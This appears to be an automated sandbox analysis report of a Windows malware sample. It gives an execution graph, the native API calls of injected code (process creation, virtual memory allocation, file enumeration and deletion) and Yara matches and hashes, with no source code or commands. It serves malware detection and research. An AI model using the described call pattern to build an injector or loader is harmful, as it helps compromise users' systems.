                                                                                                                                    Signature Coverage:2.1%
                                                                                                                                    Total number of Nodes:475
                                                                                                                                    Total number of Limit Nodes:77
                                                                                                                                    execution_graph 80535 2a09ca0 80537 2a09caf 80535->80537 80536 2a09cf0 80537->80536 80538 2a09cdd CreateThread 80537->80538 80539 2a15ae0 80544 2a18010 80539->80544 80541 2a15b10 80543 2a15b3c 80541->80543 80548 2a17f90 80541->80548 80545 2a18023 80544->80545 80555 2a28850 80545->80555 80547 2a1804e 80547->80541 80549 2a17fd4 80548->80549 80550 2a17ff5 80549->80550 80561 2a28620 80549->80561 80550->80541 80552 2a17fe5 80553 2a18001 80552->80553 80566 2a29300 80552->80566 80553->80541 80556 2a288cb 80555->80556 80557 2a28878 80555->80557 80560 31c2dd0 LdrInitializeThunk 80556->80560 80557->80547 80558 2a288f0 80558->80547 80560->80558 80562 2a2869d 80561->80562 80563 2a2864c 80561->80563 80569 31c4650 LdrInitializeThunk 80562->80569 80563->80552 80564 2a286c2 80564->80552 80567 2a2931a 80566->80567 80568 2a2932b NtClose 80567->80568 80568->80550 80569->80564 80570 2a17060 80571 2a1707c 80570->80571 80573 2a170cf 80570->80573 80572 2a29300 NtClose 80571->80572 80571->80573 80574 2a17097 80572->80574 80579 2a17207 80573->80579 80581 2a16480 NtClose LdrInitializeThunk LdrInitializeThunk 80573->80581 80580 2a16480 NtClose LdrInitializeThunk LdrInitializeThunk 80574->80580 80576 2a171e1 80576->80579 80582 2a16650 NtClose LdrInitializeThunk LdrInitializeThunk 80576->80582 80580->80573 80581->80576 80582->80579 80583 2a1ac60 80588 2a1a970 80583->80588 80585 2a1ac6d 80604 2a1a5f0 80585->80604 80587 2a1ac89 80589 2a1a995 80588->80589 80616 2a18280 80589->80616 80592 2a1aae3 80592->80585 80594 2a1aafa 80594->80585 80596 2a1aaf1 80596->80594 80599 2a1abe7 80596->80599 80635 2a24de0 80596->80635 80640 2a1a040 80596->80640 80598 2a24de0 GetFileAttributesW 80598->80599 80599->80598 80601 2a1ac4a 80599->80601 80649 2a1a3b0 80599->80649 80653 2a2b410 80601->80653 80605 2a1a606 80604->80605 80608 2a1a611 80604->80608 80606 2a2b4f0 RtlAllocateHeap 80605->80606 80606->80608 80607 2a1a632 80607->80587 80608->80607 80609 2a18280 GetFileAttributesW 80608->80609 80610 2a1a942 80608->80610 80613 2a24de0 GetFileAttributesW 80608->80613 80614 2a1a040 RtlFreeHeap 80608->80614 80615 2a1a3b0 RtlFreeHeap 80608->80615 80609->80608 80611 2a1a95b 80610->80611 80612 2a2b410 RtlFreeHeap 80610->80612 80611->80587 80612->80611 80613->80608 80614->80608 80615->80608 80617 2a182a1 80616->80617 80618 2a182a8 GetFileAttributesW 80617->80618 80619 2a182b3 80617->80619 80618->80619 80619->80592 80620 2a232e0 80619->80620 80621 2a232ee 80620->80621 80622 2a232f5 80620->80622 80621->80596 80656 2a14460 80622->80656 80624 2a2332a 80625 2a23339 80624->80625 80664 2a22da0 LdrLoadDll 80624->80664 80631 2a234e7 80625->80631 80661 2a2b4f0 80625->80661 80628 2a23352 80629 2a234dd 80628->80629 80628->80631 80632 2a2336e 80628->80632 80630 2a2b410 RtlFreeHeap 80629->80630 80629->80631 80630->80631 80631->80596 80632->80631 80633 2a2b410 RtlFreeHeap 80632->80633 80634 2a234d1 80633->80634 80634->80596 80636 2a24e45 80635->80636 80637 2a24e7c 80636->80637 80668 2a182d0 80636->80668 80637->80596 80639 2a24e5e 80639->80596 80641 2a1a066 80640->80641 80672 2a1da70 80641->80672 80643 2a1a0d8 80645 2a1a260 80643->80645 80647 2a1a0f6 80643->80647 80644 2a1a245 80644->80596 80645->80644 80646 2a19f00 RtlFreeHeap 80645->80646 80646->80645 80647->80644 80677 2a19f00 80647->80677 80650 2a1a3d6 80649->80650 80651 2a1da70 RtlFreeHeap 80650->80651 80652 2a1a45d 80651->80652 80652->80599 80685 2a29660 80653->80685 80655 2a1ac51 80655->80585 80658 2a14484 80656->80658 80657 2a1448b 80657->80624 80658->80657 80659 2a144c0 LdrLoadDll 80658->80659 80660 2a144d7 80658->80660 80659->80660 80660->80624 80665 2a29610 80661->80665 80663 2a2b50b 80663->80628 80664->80625 80666 2a2962a 80665->80666 80667 2a2963b RtlAllocateHeap 80666->80667 80667->80663 80669 2a182a6 80668->80669 80670 2a182a8 GetFileAttributesW 80669->80670 80671 2a182b3 80669->80671 80670->80671 80671->80639 80674 2a1da82 80672->80674 80673 2a1daa1 80673->80643 80674->80673 80675 2a2b410 RtlFreeHeap 80674->80675 80676 2a1dae4 80675->80676 80676->80643 80678 2a19f1d 80677->80678 80681 2a1db00 80678->80681 80680 2a1a023 80680->80647 80682 2a1db24 80681->80682 80683 2a1dbce 80682->80683 80684 2a2b410 RtlFreeHeap 80682->80684 80683->80680 80684->80683 80686 2a2967a 80685->80686 80687 2a2968b RtlFreeHeap 80686->80687 80687->80655 80688 2a1f760 80689 2a1f7c4 80688->80689 80717 2a161f0 80689->80717 80691 2a1f8fe 80692 2a1f8f7 80692->80691 80724 2a16300 80692->80724 80694 2a1faa3 80695 2a1f97a 80695->80694 80696 2a1fab2 80695->80696 80728 2a1f540 80695->80728 80697 2a29300 NtClose 80696->80697 80699 2a1fabc 80697->80699 80700 2a1f9b6 80700->80696 80701 2a1f9c1 80700->80701 80702 2a2b4f0 RtlAllocateHeap 80701->80702 80703 2a1f9ea 80702->80703 80704 2a1f9f3 80703->80704 80705 2a1fa09 80703->80705 80706 2a29300 NtClose 80704->80706 80737 2a1f430 CoInitialize 80705->80737 80708 2a1f9fd 80706->80708 80709 2a1fa17 80740 2a28dd0 80709->80740 80711 2a1fa92 80712 2a29300 NtClose 80711->80712 80713 2a1fa9c 80712->80713 80714 2a2b410 RtlFreeHeap 80713->80714 80714->80694 80715 2a1fa35 80715->80711 80716 2a28dd0 LdrInitializeThunk 80715->80716 80716->80715 80718 2a16223 80717->80718 80719 2a16247 80718->80719 80744 2a28e70 80718->80744 80719->80692 80721 2a1626a 80721->80719 80722 2a29300 NtClose 80721->80722 80723 2a162ea 80722->80723 80723->80692 80725 2a16325 80724->80725 80749 2a28c60 80725->80749 80729 2a1f55c 80728->80729 80730 2a14460 LdrLoadDll 80729->80730 80732 2a1f57a 80730->80732 80731 2a1f583 80731->80700 80732->80731 80733 2a14460 LdrLoadDll 80732->80733 80734 2a1f64e 80733->80734 80735 2a14460 LdrLoadDll 80734->80735 80736 2a1f6ab 80734->80736 80735->80736 80736->80700 80738 2a1f495 80737->80738 80739 2a1f52b CoUninitialize 80738->80739 80739->80709 80741 2a28dea 80740->80741 80754 31c2ba0 LdrInitializeThunk 80741->80754 80742 2a28e1a 80742->80715 80745 2a28e8d 80744->80745 80748 31c2ca0 LdrInitializeThunk 80745->80748 80746 2a28eb9 80746->80721 80748->80746 80750 2a28c7a 80749->80750 80753 31c2c60 LdrInitializeThunk 80750->80753 80751 2a16399 80751->80695 80753->80751 80754->80742 80760 2a29260 80761 2a292d4 80760->80761 80763 2a29288 80760->80763 80762 2a292ea NtDeleteFile 80761->80762 80764 2a20060 80765 2a2007d 80764->80765 80766 2a14460 LdrLoadDll 80765->80766 80767 2a2009b 80766->80767 80768 2a13063 80773 2a17c90 80768->80773 80770 2a1308f 80772 2a29300 NtClose 80772->80770 80775 2a17c9a 80773->80775 80774 2a13073 80774->80770 80774->80772 80775->80774 80779 2a289f0 80775->80779 80778 2a29300 NtClose 80778->80774 80780 2a28a0d 80779->80780 80783 31c35c0 LdrInitializeThunk 80780->80783 80781 2a17d7a 80781->80778 80783->80781 80784 2a126a7 80785 2a126e8 80784->80785 80786 2a161f0 2 API calls 80785->80786 80787 2a126f3 80786->80787 80788 31c2ad0 LdrInitializeThunk 80789 2a19b2f 80790 2a19b46 80789->80790 80791 2a19b4b 80789->80791 80792 2a19b7d 80791->80792 80793 2a2b410 RtlFreeHeap 80791->80793 80793->80792 80794 2a0b4b0 80797 2a2b380 80794->80797 80796 2a0cb21 80800 2a29460 80797->80800 80799 2a2b3b1 80799->80796 80801 2a294f5 80800->80801 80803 2a2948b 80800->80803 80802 2a2950b NtAllocateVirtualMemory 80801->80802 80802->80799 80803->80799 80804 2a10cf0 80805 2a10d0a 80804->80805 80806 2a14460 LdrLoadDll 80805->80806 80807 2a10d28 80805->80807 80806->80807 80808 2a10d5c PostThreadMessageW 80807->80808 80809 2a10d6d 80807->80809 80808->80809 80810 2a121f0 80811 2a12226 80810->80811 80815 2a28950 80810->80815 80813 2a1223b 80811->80813 80819 2a29390 80811->80819 80816 2a2896a 80815->80816 80824 31c2c0a 80816->80824 80817 2a28996 80817->80811 80820 2a2941f 80819->80820 80822 2a293bb 80819->80822 80827 31c2e80 LdrInitializeThunk 80820->80827 80821 2a29450 80821->80813 80822->80813 80825 31c2c1f LdrInitializeThunk 80824->80825 80826 31c2c11 80824->80826 80825->80817 80826->80817 80827->80821 80828 2a216b0 80829 2a216cc 80828->80829 80830 2a216f4 80829->80830 80831 2a21708 80829->80831 80832 2a29300 NtClose 80830->80832 80833 2a29300 NtClose 80831->80833 80834 2a216fd 80832->80834 80835 2a21711 80833->80835 80838 2a2b530 RtlAllocateHeap 80835->80838 80837 2a2171c 80838->80837 80839 2a29170 80840 2a29214 80839->80840 80842 2a29198 80839->80842 80841 2a2922a NtReadFile 80840->80841 80843 2a25770 80844 2a257d2 80843->80844 80846 2a257df 80844->80846 80847 2a172c0 80844->80847 80849 2a172ab 80847->80849 80848 2a1732c 80849->80848 80852 2a1b190 80849->80852 80851 2a172b2 80851->80846 80853 2a1b1b6 80852->80853 80854 2a1b3e3 80853->80854 80879 2a296f0 80853->80879 80854->80851 80856 2a1b22c 80856->80854 80882 2a2c5e0 80856->80882 80858 2a1b24b 80858->80854 80859 2a1b31f 80858->80859 80861 2a28950 LdrInitializeThunk 80858->80861 80860 2a1b33e 80859->80860 80862 2a15a60 LdrInitializeThunk 80859->80862 80866 2a1b3cb 80860->80866 80891 2a284c0 80860->80891 80863 2a1b2ad 80861->80863 80862->80860 80863->80859 80864 2a1b2b6 80863->80864 80864->80854 80865 2a1b2e8 80864->80865 80875 2a1b307 80864->80875 80888 2a15a60 80864->80888 80906 2a24710 LdrInitializeThunk 80865->80906 80868 2a18010 LdrInitializeThunk 80866->80868 80867 2a18010 LdrInitializeThunk 80872 2a1b315 80867->80872 80873 2a1b3d9 80868->80873 80872->80851 80873->80851 80874 2a1b3a2 80896 2a28570 80874->80896 80875->80867 80877 2a1b3bc 80901 2a286d0 80877->80901 80880 2a2970d 80879->80880 80881 2a2971e CreateProcessInternalW 80880->80881 80881->80856 80883 2a2c550 80882->80883 80884 2a2c5ad 80883->80884 80885 2a2b4f0 RtlAllocateHeap 80883->80885 80884->80858 80886 2a2c58a 80885->80886 80887 2a2b410 RtlFreeHeap 80886->80887 80887->80884 80907 2a28b20 80888->80907 80890 2a15a9e 80890->80865 80892 2a2853d 80891->80892 80894 2a284eb 80891->80894 80913 31c39b0 LdrInitializeThunk 80892->80913 80893 2a28562 80893->80874 80894->80874 80897 2a285ea 80896->80897 80898 2a28598 80896->80898 80914 31c4340 LdrInitializeThunk 80897->80914 80898->80877 80899 2a2860f 80899->80877 80902 2a2874d 80901->80902 80904 2a286fb 80901->80904 80915 31c2fb0 LdrInitializeThunk 80902->80915 80903 2a28772 80903->80866 80904->80866 80906->80875 80908 2a28bd1 80907->80908 80909 2a28b4f 80907->80909 80912 31c2d10 LdrInitializeThunk 80908->80912 80909->80890 80910 2a28c16 80910->80890 80912->80910 80913->80893 80914->80899 80915->80903 80916 2a18734 80918 2a18744 80916->80918 80917 2a186f4 80918->80917 80920 2a16fe0 80918->80920 80921 2a16ff6 80920->80921 80923 2a1702f 80920->80923 80921->80923 80924 2a16e50 LdrLoadDll 80921->80924 80923->80917 80924->80923 80925 2a09d00 80926 2a09fcf 80925->80926 80928 2a0a351 80926->80928 80929 2a2b040 80926->80929 80930 2a2b083 80929->80930 80935 2a03f50 80930->80935 80932 2a2b08f 80934 2a2b0c8 80932->80934 80938 2a25590 80932->80938 80934->80928 80936 2a03f5d 80935->80936 80942 2a13170 80935->80942 80936->80932 80939 2a255f2 80938->80939 80941 2a255ff 80939->80941 80953 2a11910 80939->80953 80941->80934 80943 2a1318d 80942->80943 80945 2a131a6 80943->80945 80946 2a29d50 80943->80946 80945->80936 80948 2a29d6a 80946->80948 80947 2a29d99 80947->80945 80948->80947 80949 2a28950 LdrInitializeThunk 80948->80949 80950 2a29df9 80949->80950 80951 2a2b410 RtlFreeHeap 80950->80951 80952 2a29e12 80951->80952 80952->80945 80954 2a1194b 80953->80954 80969 2a17da0 80954->80969 80956 2a11953 80957 2a11c36 80956->80957 80958 2a2b4f0 RtlAllocateHeap 80956->80958 80957->80941 80959 2a11969 80958->80959 80960 2a2b4f0 RtlAllocateHeap 80959->80960 80961 2a1197a 80960->80961 80962 2a2b4f0 RtlAllocateHeap 80961->80962 80963 2a1198b 80962->80963 80968 2a11a22 80963->80968 80984 2a16950 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 80963->80984 80965 2a14460 LdrLoadDll 80966 2a11be2 80965->80966 80980 2a27ed0 80966->80980 80968->80965 80970 2a17dcc 80969->80970 80971 2a17c90 2 API calls 80970->80971 80972 2a17def 80971->80972 80973 2a17e11 80972->80973 80974 2a17df9 80972->80974 80975 2a17e2d 80973->80975 80978 2a29300 NtClose 80973->80978 80976 2a17e04 80974->80976 80977 2a29300 NtClose 80974->80977 80975->80956 80976->80956 80977->80976 80979 2a17e23 80978->80979 80979->80956 80981 2a27f31 80980->80981 80983 2a27f3e 80981->80983 80985 2a11c50 80981->80985 80983->80957 80984->80968 81001 2a18070 80985->81001 80987 2a11c70 80996 2a121d3 80987->80996 81005 2a21070 80987->81005 80990 2a11e87 80992 2a2c5e0 2 API calls 80990->80992 80991 2a11ccb 80991->80996 81008 2a2c4b0 80991->81008 80993 2a11e9c 80992->80993 80994 2a11eec 80993->80994 81013 2a10790 80993->81013 80995 2a18010 LdrInitializeThunk 80994->80995 80994->80996 80999 2a10790 LdrInitializeThunk 80994->80999 80995->80994 80996->80983 80998 2a18010 LdrInitializeThunk 81000 2a12040 80998->81000 80999->80994 81000->80994 81000->80998 81002 2a1807d 81001->81002 81003 2a180a5 81002->81003 81004 2a1809e SetErrorMode 81002->81004 81003->80987 81004->81003 81006 2a2b380 NtAllocateVirtualMemory 81005->81006 81007 2a21091 81006->81007 81007->80991 81009 2a2c4c0 81008->81009 81010 2a2c4c6 81008->81010 81009->80990 81011 2a2b4f0 RtlAllocateHeap 81010->81011 81012 2a2c4ec 81011->81012 81012->80990 81014 2a107ac 81013->81014 81017 2a29580 81014->81017 81018 2a2959a 81017->81018 81021 31c2c70 LdrInitializeThunk 81018->81021 81019 2a107b2 81019->81000 81021->81019 81022 2a16cc0 81023 2a16cea 81022->81023 81026 2a17e40 81023->81026 81025 2a16d14 81027 2a17e5d 81026->81027 81033 2a28a40 81027->81033 81029 2a17ead 81030 2a17eb4 81029->81030 81031 2a28b20 LdrInitializeThunk 81029->81031 81030->81025 81032 2a17edd 81031->81032 81032->81025 81034 2a28adb 81033->81034 81036 2a28a6b 81033->81036 81038 31c2f30 LdrInitializeThunk 81034->81038 81035 2a28b14 81035->81029 81036->81029 81038->81035 81039 2a17240 81040 2a172b2 81039->81040 81041 2a17258 81039->81041 81041->81040 81042 2a1b190 9 API calls 81041->81042 81042->81040 81043 2a1c500 81045 2a1c529 81043->81045 81044 2a1c62d 81045->81044 81046 2a1c5d3 FindFirstFileW 81045->81046 81046->81044 81049 2a1c5ee 81046->81049 81047 2a1c614 FindNextFileW 81048 2a1c626 FindClose 81047->81048 81047->81049 81048->81044 81049->81047 81050 2a29000 81051 2a290b7 81050->81051 81053 2a2902f 81050->81053 81052 2a290cd NtCreateFile 81051->81052 81054 2a26000 81055 2a2605a 81054->81055 81057 2a26067 81055->81057 81058 2a23a10 81055->81058 81059 2a2b380 NtAllocateVirtualMemory 81058->81059 81061 2a23a51 81059->81061 81060 2a23b5e 81060->81057 81061->81060 81062 2a14460 LdrLoadDll 81061->81062 81064 2a23a97 81062->81064 81063 2a23ae0 Sleep 81063->81064 81064->81060 81064->81063 81065 2a21a40 81066 2a21a59 81065->81066 81067 2a21aa4 81066->81067 81070 2a21ae7 81066->81070 81072 2a21aec 81066->81072 81068 2a2b410 RtlFreeHeap 81067->81068 81069 2a21ab4 81068->81069 81071 2a2b410 RtlFreeHeap 81070->81071 81071->81072 81073 2a28780 81074 2a2880f 81073->81074 81076 2a287ab 81073->81076 81078 31c2ee0 LdrInitializeThunk 81074->81078 81075 2a28840 81078->81075 81079 2a28900 81080 2a2891a 81079->81080 81083 31c2df0 LdrInitializeThunk 81080->81083 81081 2a28942 81083->81081 81085 2a1fad0 81088 2a27430 81085->81088 81087 2a1faef 81089 2a27495 81088->81089 81090 2a274c4 81089->81090 81093 2a1d870 81089->81093 81090->81087 81092 2a274a6 81092->81087 81095 2a1d7e0 81093->81095 81094 2a1d85c 81094->81092 81095->81094 81096 2a24de0 GetFileAttributesW 81095->81096 81096->81095 81097 2a259d0 81098 2a25a35 81097->81098 81099 2a25a70 81098->81099 81102 2a21340 81098->81102 81101 2a25a52 81103 2a2132a 81102->81103 81104 2a213f8 81103->81104 81105 2a29300 NtClose 81103->81105 81104->81101 81106 2a2132f 81105->81106 81106->81101 81107 2a2c510 81108 2a2b410 RtlFreeHeap 81107->81108 81109 2a2c525 81108->81109

                                                                                                                                    Executed Functions

                                                                                                                                    Function 02A09D00 Relevance: 21.6, Strings: 17, Instructions: 338COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 171 2a09d00-2a09fcd 172 2a09fde-2a09fe7 171->172 173 2a09fcf-2a09fd8 171->173 174 2a09fe9-2a09ffc 172->174 175 2a09ffe-2a0a008 172->175 173->172 174->173 176 2a0a019-2a0a020 175->176 177 2a0a022-2a0a049 176->177 178 2a0a04b 176->178 177->176 179 2a0a052-2a0a05c 178->179 181 2a0a090-2a0a0a1 179->181 182 2a0a05e-2a0a07d 179->182 185 2a0a0b2-2a0a0bb 181->185 183 2a0a08e 182->183 184 2a0a07f-2a0a088 182->184 183->179 184->183 186 2a0a0bd-2a0a0cc 185->186 187 2a0a0ce-2a0a0df 185->187 186->185 189 2a0a0f0-2a0a0fc 187->189 190 2a0a112-2a0a11b 189->190 191 2a0a0fe-2a0a110 189->191 193 2a0a121-2a0a13a 190->193 194 2a0a27c-2a0a286 190->194 191->189 193->193 196 2a0a13c-2a0a154 193->196 195 2a0a297-2a0a2a0 194->195 199 2a0a2a2-2a0a2ae 195->199 200 2a0a2be-2a0a2c8 195->200 197 2a0a240-2a0a246 196->197 198 2a0a15a-2a0a164 196->198 205 2a0a24a-2a0a24e 197->205 201 2a0a175-2a0a181 198->201 202 2a0a2b0-2a0a2b6 199->202 203 2a0a2bc 199->203 204 2a0a2d9-2a0a2e5 200->204 206 2a0a183-2a0a192 201->206 207 2a0a194-2a0a19e 201->207 202->203 203->195 209 2a0a2f5-2a0a2fc 204->209 210 2a0a2e7-2a0a2f3 204->210 211 2a0a250-2a0a275 205->211 212 2a0a277 205->212 206->201 213 2a0a1af-2a0a1bb 207->213 216 2a0a351-2a0a358 209->216 217 2a0a2fe-2a0a308 209->217 210->204 211->205 212->190 218 2a0a1d2-2a0a1d6 213->218 219 2a0a1bd-2a0a1d0 213->219 220 2a0a35a-2a0a370 216->220 221 2a0a37d-2a0a386 216->221 222 2a0a319-2a0a325 217->222 223 2a0a204-2a0a20b 218->223 224 2a0a1d8-2a0a202 218->224 219->213 226 2a0a372-2a0a378 220->226 227 2a0a37b 220->227 228 2a0a388-2a0a3a9 221->228 229 2a0a3ab-2a0a3af 221->229 230 2a0a327-2a0a330 222->230 231 2a0a34c call 2a2b040 222->231 235 2a0a20d-2a0a23c 223->235 236 2a0a23e 223->236 224->218 226->227 227->216 228->221 237 2a0a3d0-2a0a3da 229->237 238 2a0a3b1-2a0a3ce 229->238 232 2a0a332-2a0a336 230->232 233 2a0a337-2a0a339 230->233 231->216 232->233 239 2a0a34a 233->239 240 2a0a33b-2a0a344 233->240 235->223 236->194 238->229 241 2a0a30a-2a0a313 239->241 240->239 241->222
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 2$):$+x$1`$<8$>$BL$Fv$L$R<$[$g$l$lv$u7$}$5
                                                                                                                                    • API String ID: 0-2604029153
                                                                                                                                    • Opcode ID: cbde5d38693fc39788544a4ae2cd40bf7f64d6e88385f7ff788a72cbffd7e7b6
                                                                                                                                    • Instruction ID: 08b44420abe0d4d0fd75aeb61711b85095770e644892e7920ee4e25288b446c1
                                                                                                                                    • Opcode Fuzzy Hash: cbde5d38693fc39788544a4ae2cd40bf7f64d6e88385f7ff788a72cbffd7e7b6
                                                                                                                                    • Instruction Fuzzy Hash: 5302C4B0D05269CBEB24CF84D994BDDBBB2BB44308F1081DAC2097B291DBB55E89CF55
                                                                                                                                    Function 02A1C500 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A1C5E4
                                                                                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 02A1C61F
                                                                                                                                    • FindClose.KERNELBASE(?), ref: 02A1C62A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                    • Opcode ID: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                                                                                                    • Instruction ID: 6523829950462e741ae1a783a67bc3e90760741811f7727d980db605215df960
                                                                                                                                    • Opcode Fuzzy Hash: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                                                                                                    • Instruction Fuzzy Hash: 3031C6B1980348BBDB20EB64CD85FEF777D9F54718F104459BA18A7180EF70AA84CBA1
                                                                                                                                    Function 02A29000 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?,?,?), ref: 02A290FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                                                                                                    • Instruction ID: 82a8119c421a6dfe2492be25baaaf1e22016c3f4f64bbd7d55dc288633f4ce60
                                                                                                                                    • Opcode Fuzzy Hash: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                                                                                                    • Instruction Fuzzy Hash: 8B31D3B1A00208AFDB14DF98D980EEEB7B9AF8C304F108219F918A7344D734A8458BA4
                                                                                                                                    Function 02A29170 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?), ref: 02A29253
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                                                                                                    • Instruction ID: cbc918fc70ecfbf5ce471dfaa94fcf338066e5c3bd9a0d366dc05365d5e0f0d2
                                                                                                                                    • Opcode Fuzzy Hash: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                                                                                                    • Instruction Fuzzy Hash: 8D31D2B5A40208AFDB14DF98D980EEFB7B9EF88714F108219F919A7240D774A9158FA4
                                                                                                                                    Function 02A29460 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(02A11CCB,?,02A27F3E,00000000,00000004,00003000,?,?,?,?,?,02A27F3E,02A11CCB,02A2B3B1,02A27F3E,56C03309), ref: 02A29528
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                    • Opcode ID: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                                                                                                    • Instruction ID: 9db06a9a3c3c1c3c96d38d8f69c49dd905767c591c4bac0d1e68a59b0ec84778
                                                                                                                                    • Opcode Fuzzy Hash: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                                                                                                    • Instruction Fuzzy Hash: C3212BB5A40209AFDB10DF98DD81FEF77B9EF88700F104209FD19A7240DB74A9158BA1
                                                                                                                                    Function 02A29260 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                    • Opcode ID: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                                                                                                    • Instruction ID: e58d16e21e1ef7fd4944b5190dda78351e12db02dd7f80d9ab52ad0b3234b0cb
                                                                                                                                    • Opcode Fuzzy Hash: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                                                                                                    • Instruction Fuzzy Hash: B411A3719402197BD720EB98CD41FEB73ADDF84714F104149F908A7280DB75B9058BA1
                                                                                                                                    Function 02A29300 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A29334
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                                                                                    • Instruction ID: f9c318a97288e5efbe837c67dde68009625da7e62b92ac26b2e782d847fe318d
                                                                                                                                    • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                                                                                    • Instruction Fuzzy Hash: 1AE08C32240214BBE220EE59DC41FDBB7ADDFC5764F408419FA0CA7241CA71B9118BF0
                                                                                                                                    Function 031C4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
